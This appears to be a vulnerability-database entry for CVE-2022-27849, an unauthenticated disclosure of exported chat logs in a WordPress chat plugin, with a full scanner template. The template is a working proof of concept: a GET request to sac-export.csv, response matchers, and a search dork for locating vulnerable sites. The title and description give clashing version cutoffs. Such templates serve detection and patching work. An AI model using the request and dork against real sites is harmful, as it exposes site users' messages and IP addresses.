CVE-2022-27849: WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability

2025-08-01 WordPress Simple Ajax Chat PoC Public

Description

WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it.

PoC

id: CVE-2022-27849

info:
  name: WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability
  author: random-robbie
  severity: high
  description: |
    WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or private messages.
  remediation: |
    Update to the latest version of the WordPress Simple Ajax Chat plugin to fix the vulnerability.
  reference:
    - https://wordpress.org/plugins/simple-ajax-chat/#developers
    - https://patchstack.com/database/vulnerability/simple-ajax-chat/wordpress-simple-ajax-chat-plugin-20220115-sensitive-information-disclosure-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2022-27849
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-27849
    cwe-id: CWE-200
    epss-score: 0.04619
    epss-percentile: 0.91216
    cpe: cpe:2.3:a:plugin-planet:simple_ajax_chat:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: plugin-planet
    product: simple_ajax_chat
    framework: wordpress
    google-query: inurl:/wp-content/plugins/simple-ajax-chat/
  tags: cve,cve2022,wp,wordpress,wp-plugin,disclosure,plugin-planet,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"Chat Log"'
          - '"User IP"'
          - '"User ID"'
        condition: and

      - type: word
        part: header
        words:
          - text/csv

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100cad1a10b35e41e73ea789f92fa2944bcf6aa4a0561589145e18923df82eaf5e5022100ac09bd7abcfe0e322e1bd668728e5394291b4d8fd2a1aa4295ee20f5bd416515:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities